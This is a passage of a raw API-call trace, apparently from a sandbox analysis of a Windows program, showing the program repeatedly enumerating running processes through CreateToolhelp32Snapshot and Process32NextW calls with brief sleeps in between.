pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0141.264] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0141.266] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0141.291] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0141.293] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0141.294] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0141.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0141.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0141.298] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0141.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0141.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) 
returned 1 [0141.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0141.304] CloseHandle (hObject=0xbc) returned 1 [0141.305] Sleep (dwMilliseconds=0x12c) [0142.175] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0142.181] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0142.183] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0142.184] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.185] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0142.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.186] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0142.187] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0142.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0142.190] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0142.191] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.192] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.194] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0142.196] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.197] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.198] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0142.199] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0142.202] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0142.203] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0142.205] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0142.206] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.208] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0142.209] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0142.211] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0142.212] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0142.214] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0142.215] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0142.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0142.218] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0142.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 
| out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0142.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0142.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0142.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0142.400] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0142.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0142.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0142.403] Process32NextW (in: hSnapshot=0xc4, 
lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0142.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0142.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0142.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0142.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0142.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0142.410] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.411] 
Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0142.413] CloseHandle (hObject=0xc4) returned 1 [0142.413] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0142.417] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.418] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0142.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0142.419] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.420] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0142.421] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0142.458] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0142.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0142.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0142.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0142.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.466] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0142.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.620] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0142.621] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.622] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0142.624] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0142.625] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, 